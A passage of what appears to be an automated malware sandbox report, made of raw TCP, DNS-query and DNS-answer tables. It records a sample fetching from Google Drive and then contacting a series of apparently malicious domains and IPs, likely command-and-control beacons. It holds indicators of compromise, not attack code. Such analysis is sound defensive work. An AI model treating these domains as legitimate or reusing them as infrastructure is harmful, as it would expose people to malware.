                                                                                                                    May 30, 2023 11:13:29.839032888 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.839102030 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.839129925 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.839303017 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.883946896 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.885624886 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.885689974 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.885860920 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.885937929 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.886210918 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.886348963 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.886466026 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.886493921 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.886509895 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.886552095 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.886697054 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.932852030 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.932977915 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.933296919 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.933358908 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.933609962 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.933832884 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:31.305563927 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:32.321211100 CEST4985880192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:32.368201971 CEST8049858185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:32.368551016 CEST4985880192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:32.368611097 CEST4985880192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:32.415499926 CEST8049858185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:32.415574074 CEST8049858185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:32.415625095 CEST8049858185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:32.416089058 CEST4985880192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:32.416167974 CEST4985880192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:32.462719917 CEST8049858185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:37.461492062 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:38.475816011 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:38.533718109 CEST8049859109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:38.533911943 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:38.534024000 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:38.552356005 CEST8049859109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:38.552580118 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:39.485235929 CEST8049859109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:39.538173914 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:39.997931004 CEST8049859109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:39.998265982 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:40.038079977 CEST4985980192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:41.053694963 CEST4986080192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:41.130512953 CEST8049860109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:41.130711079 CEST4986080192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:41.130824089 CEST4986080192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:41.205630064 CEST8049860109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:41.649023056 CEST8049860109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:41.649068117 CEST8049860109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:41.649190903 CEST4986080192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:42.631138086 CEST4986080192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.647068977 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.724667072 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.724951982 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.725548983 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.800508976 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.800574064 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.800616980 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.800802946 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.800889015 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.801022053 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.801237106 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.801438093 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.827404022 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.876363039 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.876430035 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.876472950 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.876614094 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.876643896 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.876770020 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:43.949140072 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.949207067 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.949251890 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.951040983 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.951106071 CEST8049861109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:43.951354027 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:45.239965916 CEST4986180192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:46.255587101 CEST4986280192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:46.333851099 CEST8049862109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:46.334218025 CEST4986280192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:46.334471941 CEST4986280192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:46.438244104 CEST8049862109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:46.438287973 CEST8049862109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:46.438510895 CEST4986280192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:46.438631058 CEST4986280192.168.11.20109.123.121.243
                                                                                                                    May 30, 2023 11:13:46.514682055 CEST8049862109.123.121.243192.168.11.20
                                                                                                                    May 30, 2023 11:13:51.442563057 CEST4986380192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:51.608582020 CEST8049863162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:51.608867884 CEST4986380192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:51.609028101 CEST4986380192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:51.777358055 CEST8049863162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:51.777434111 CEST8049863162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:51.777620077 CEST4986380192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:53.113270044 CEST4986380192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:54.128873110 CEST4986480192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:54.294440985 CEST8049864162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:54.294653893 CEST4986480192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:54.294806004 CEST4986480192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:54.462641001 CEST8049864162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:54.462718964 CEST8049864162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:54.463005066 CEST4986480192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:55.800292015 CEST4986480192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:56.815974951 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:56.981270075 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:56.981488943 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:56.982122898 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:56.982156992 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.147150993 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.147239923 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.147414923 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.147525072 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.312793016 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.312850952 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.313009977 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.313123941 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.313201904 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.313287020 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.313457966 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:57.478602886 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.478663921 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.478705883 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.479331970 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.479393959 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.481710911 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.481782913 CEST8049865162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:57.481964111 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:58.487258911 CEST4986580192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:59.502824068 CEST4986680192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:59.667964935 CEST8049866162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:59.668220043 CEST4986680192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:59.668313980 CEST4986680192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:59.835793972 CEST8049866162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:59.835835934 CEST8049866162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:13:59.836074114 CEST4986680192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:13:59.836240053 CEST4986680192.168.11.20162.214.206.200
                                                                                                                    May 30, 2023 11:14:00.000883102 CEST8049866162.214.206.200192.168.11.20
                                                                                                                    May 30, 2023 11:14:04.864413977 CEST4986780192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:04.888977051 CEST8049867213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:04.889259100 CEST4986780192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:04.889312983 CEST4986780192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:04.913883924 CEST8049867213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:04.913955927 CEST8049867213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:04.914006948 CEST8049867213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:04.914180994 CEST4986780192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:06.391705036 CEST4986780192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:07.407269955 CEST4986880192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:07.431468964 CEST8049868213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:07.431653023 CEST4986880192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:07.431772947 CEST4986880192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:07.456013918 CEST8049868213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:07.456044912 CEST8049868213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:07.456057072 CEST8049868213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:07.456193924 CEST4986880192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:08.937989950 CEST4986880192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:09.953624964 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:09.978198051 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:09.978545904 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:09.979192972 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:09.979279041 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.004146099 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.004235029 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.004312038 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.004362106 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.004403114 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.004406929 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.004443884 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.004585981 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.004776001 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.029125929 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.029196024 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.029383898 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.029495001 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.029503107 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.029589891 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.029638052 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.029819965 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.029925108 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.029985905 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:10.030081034 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.030239105 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.030284882 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.054297924 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.054375887 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.054883957 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.054958105 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.055016994 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.055079937 CEST8049869213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:10.055289984 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:11.484256983 CEST4986980192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.499957085 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.524337053 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.524616003 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.524616003 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.549180031 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549288034 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549356937 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549423933 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549489021 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549552917 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549609900 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549669027 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    May 30, 2023 11:14:12.549954891 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.549954891 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.550029039 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.550203085 CEST4987080192.168.11.20213.171.195.105
                                                                                                                    May 30, 2023 11:14:12.574795961 CEST8049870213.171.195.105192.168.11.20
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    May 30, 2023 11:06:50.924263954 CEST6360253192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:06:50.933461905 CEST53636021.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:06:51.456561089 CEST6281553192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:06:51.477216005 CEST53628151.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:07:53.444374084 CEST6177453192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:07:53.772279024 CEST53617741.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:08:08.892122030 CEST6357753192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:08:08.912286997 CEST53635771.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:08:21.702016115 CEST6121153192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:08:21.968472004 CEST53612111.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:08:34.870801926 CEST6165453192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:08:35.298787117 CEST53616541.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:08:48.711576939 CEST6227253192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:08:48.733108044 CEST53622721.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:09:02.319672108 CEST5830353192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:09:02.342781067 CEST53583031.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:09:14.971556902 CEST5134153192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:09:15.002320051 CEST53513411.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:09:28.924863100 CEST6421153192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:09:29.449692965 CEST53642111.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:09:43.371460915 CEST5406153192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:09:43.420993090 CEST53540611.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:09:56.134274006 CEST6042053192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:09:56.253150940 CEST53604201.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.084631920 CEST5985853192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:10:09.499864101 CEST53598581.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:10:22.909676075 CEST5127053192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:10:23.107369900 CEST53512701.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:10:35.813110113 CEST4994853192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:10:35.830799103 CEST53499481.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:10:48.451175928 CEST6140253192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:10:49.466142893 CEST6140253192.168.11.209.9.9.9
                                                                                                                    May 30, 2023 11:10:49.760382891 CEST53614021.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:10:50.452802896 CEST53614029.9.9.9192.168.11.20
                                                                                                                    May 30, 2023 11:11:03.588463068 CEST6367553192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:11:03.602349043 CEST53636751.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:11:16.603025913 CEST5560753192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:11:17.031308889 CEST53556071.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:13:37.429708004 CEST6208353192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:13:37.460772038 CEST53620831.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:14:04.845823050 CEST5497853192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:14:04.863619089 CEST53549781.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:14:17.561507940 CEST6247353192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:14:17.581139088 CEST53624731.1.1.1192.168.11.20
                                                                                                                    May 30, 2023 11:14:32.792465925 CEST4977653192.168.11.201.1.1.1
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST53497761.1.1.1192.168.11.20
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    May 30, 2023 11:06:50.924263954 CEST192.168.11.201.1.1.10xbd4bStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:06:51.456561089 CEST192.168.11.201.1.1.10x302aStandard query (0)doc-04-7k-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:07:53.444374084 CEST192.168.11.201.1.1.10xb12Standard query (0)www.1win-legal1.topA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:08.892122030 CEST192.168.11.201.1.1.10x7aeeStandard query (0)www.minskadue.xyzA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:21.702016115 CEST192.168.11.201.1.1.10x39c1Standard query (0)www.marketing-solution.netA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:34.870801926 CEST192.168.11.201.1.1.10xab28Standard query (0)www.tsygy.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:48.711576939 CEST192.168.11.201.1.1.10xda5Standard query (0)www.cookcollectives.xyzA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:02.319672108 CEST192.168.11.201.1.1.10x4211Standard query (0)www.printmyride.storeA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:14.971556902 CEST192.168.11.201.1.1.10xdc7aStandard query (0)www.fairbitawayposearisk.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:28.924863100 CEST192.168.11.201.1.1.10xf688Standard query (0)www.dkansai-cp.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:43.371460915 CEST192.168.11.201.1.1.10xca6cStandard query (0)www.comoparardefumar.websiteA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:56.134274006 CEST192.168.11.201.1.1.10xe951Standard query (0)www.albaymedya.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:09.084631920 CEST192.168.11.201.1.1.10x7a3dStandard query (0)www.roconsultores.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:22.909676075 CEST192.168.11.201.1.1.10x2b5Standard query (0)www.aurizhon.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:35.813110113 CEST192.168.11.201.1.1.10x102aStandard query (0)www.solarwachstum.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:48.451175928 CEST192.168.11.201.1.1.10xd022Standard query (0)www.ep09.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:49.466142893 CEST192.168.11.209.9.9.90xd022Standard query (0)www.ep09.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:11:03.588463068 CEST192.168.11.201.1.1.10x499bStandard query (0)www.zinkiggekis.xyzA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:11:16.603025913 CEST192.168.11.201.1.1.10x3c0aStandard query (0)www.scottsteedley.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:13:37.429708004 CEST192.168.11.201.1.1.10xd2f8Standard query (0)www.oleictude.xyzA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:04.845823050 CEST192.168.11.201.1.1.10x3030Standard query (0)www.arrangeabreak.comA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:17.561507940 CEST192.168.11.201.1.1.10xd421Standard query (0)www.14-pro-max-sales.onlineA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:32.792465925 CEST192.168.11.201.1.1.10xda23Standard query (0)www.arifsantoso.infoA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    May 30, 2023 11:06:50.933461905 CEST1.1.1.1192.168.11.200xbd4bNo error (0)drive.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:06:51.477216005 CEST1.1.1.1192.168.11.200x302aNo error (0)doc-04-7k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:06:51.477216005 CEST1.1.1.1192.168.11.200x302aNo error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:07:53.772279024 CEST1.1.1.1192.168.11.200xb12No error (0)www.1win-legal1.top172.67.153.163A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:07:53.772279024 CEST1.1.1.1192.168.11.200xb12No error (0)www.1win-legal1.top104.21.90.61A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:08.912286997 CEST1.1.1.1192.168.11.200x7aeeNo error (0)www.minskadue.xyz109.123.121.243A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:21.968472004 CEST1.1.1.1192.168.11.200x39c1No error (0)www.marketing-solution.net91.195.240.45A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:35.298787117 CEST1.1.1.1192.168.11.200xab28No error (0)www.tsygy.com23.104.137.185A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:08:48.733108044 CEST1.1.1.1192.168.11.200xda5No error (0)www.cookcollectives.xyz199.192.30.147A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:02.342781067 CEST1.1.1.1192.168.11.200x4211No error (0)www.printmyride.store130.185.109.77A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:15.002320051 CEST1.1.1.1192.168.11.200xdc7aNo error (0)www.fairbitawayposearisk.comfairbitawayposearisk.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:15.002320051 CEST1.1.1.1192.168.11.200xdc7aNo error (0)fairbitawayposearisk.com216.108.231.108A (IP address)IN (0x0001)false
